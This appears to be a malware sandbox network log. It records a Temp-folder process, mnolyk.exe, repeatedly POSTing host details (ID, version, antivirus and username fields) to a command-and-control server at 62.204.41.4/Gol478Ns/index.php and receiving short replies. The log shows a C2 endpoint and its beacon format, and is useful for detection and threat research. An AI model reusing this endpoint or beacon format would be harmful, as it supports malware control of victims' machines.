                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:21.007967949 CET | 615 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    416 | 192.168.2.3 | 50119 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:21.184098005 CET | 616 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:21.249125004 CET | 616 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    417 | 192.168.2.3 | 50120 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:21.420479059 CET | 617 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:21.485718012 CET | 617 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    418 | 192.168.2.3 | 50121 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:21.657461882 CET | 618 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:21.722080946 CET | 618 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    419 | 192.168.2.3 | 50122 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:21.889662981 CET | 619 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:21.954339027 CET | 619 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 42 | Source IP: 192.168.2.3 | Source Port: 49744 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:31:27.200875044 CET | kBytes transferred: 243 | Direction: OUT | Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:31:27.266582966 CET | kBytes transferred: 243 | Direction: IN | Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 420 | Source IP: 192.168.2.3 | Source Port: 50123 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:33:22.133749962 CET | kBytes transferred: 620 | Direction: OUT | Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:33:22.198437929 CET | kBytes transferred: 620 | Direction: IN | Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 421 | Source IP: 192.168.2.3 | Source Port: 50124 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:33:22.455838919 CET | kBytes transferred: 621 | Direction: OUT | Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:33:22.522018909 CET | kBytes transferred: 621 | Direction: IN | Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 422 | Source IP: 192.168.2.3 | Source Port: 50125 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:33:22.703938961 CET | kBytes transferred: 622 | Direction: OUT | Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:33:22.768277884 CET | kBytes transferred: 622 | Direction: IN | Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 423 | Source IP: 192.168.2.3 | Source Port: 50126 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:33:22.981983900 CET | kBytes transferred: 623 | Direction: OUT | Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:33:23.047378063 CET | kBytes transferred: 623 | Direction: IN | Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 424 | Source IP: 192.168.2.3 | Source Port: 50127 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:33:23.222781897 CET | kBytes transferred: 624 | Direction: OUT | Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:33:23.285810947 CET | kBytes transferred: 624 | Direction: IN | Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 425 | Source IP: 192.168.2.3 | Source Port: 50128 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:33:23.470232964 CET | kBytes transferred: 625 | Direction: OUT | Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:33:23.533766031 CET | kBytes transferred: 625 | Direction: IN | Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 426 | Source IP: 192.168.2.3 | Source Port: 50129 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:33:23.715965033 CET | kBytes transferred: 626 | Direction: OUT | Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:33:23.778614998 CET | kBytes transferred: 626 | Direction: IN | Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 427 | Source IP: 192.168.2.3 | Source Port: 50130 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:33:23.953140974 CET | kBytes transferred: 627 | Direction: OUT | Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:33:24.018573999 CET | kBytes transferred: 627 | Direction: IN | Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 428 | Source IP: 192.168.2.3 | Source Port: 50131 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:33:24.191823006 CET | kBytes transferred: 628 | Direction: OUT | Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:33:24.256805897 CET | kBytes transferred: 628 | Direction: IN | Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 429 | Source IP: 192.168.2.3 | Source Port: 50132 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:33:24.436847925 CET | kBytes transferred: 629 | Direction: OUT | Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:33:24.499838114 CET | kBytes transferred: 629 | Direction: IN | Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 43 | Source IP: 192.168.2.3 | Source Port: 49745 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:31:27.438465118 CET | kBytes transferred: 244 | Direction: OUT | Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:31:27.502505064 CET | kBytes transferred: 244 | Direction: IN | Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 430 | Source IP: 192.168.2.3 | Source Port: 50133 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:33:24.671407938 CET | kBytes transferred: 630 | Direction: OUT | Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:33:24.736025095 CET | kBytes transferred: 630 | Direction: IN | Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 431 | Source IP: 192.168.2.3 | Source Port: 50134 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:33:24.907486916 CET | kBytes transferred: 631 | Direction: OUT | Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:33:24.970339060 CET | kBytes transferred: 631 | Direction: IN | Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    432 | 192.168.2.3 | 50135 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:25.140151024 CET | 632 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:25.203968048 CET | 632 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    433 | 192.168.2.3 | 50136 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:25.375931978 CET | 633 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:25.438723087 CET | 633 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    434 | 192.168.2.3 | 50137 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:25.608006001 CET | 634 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:25.671648026 CET | 634 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    435 | 192.168.2.3 | 50138 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:25.846129894 CET | 635 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:25.911890030 CET | 635 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    436 | 192.168.2.3 | 50139 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:26.098524094 CET | 636 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
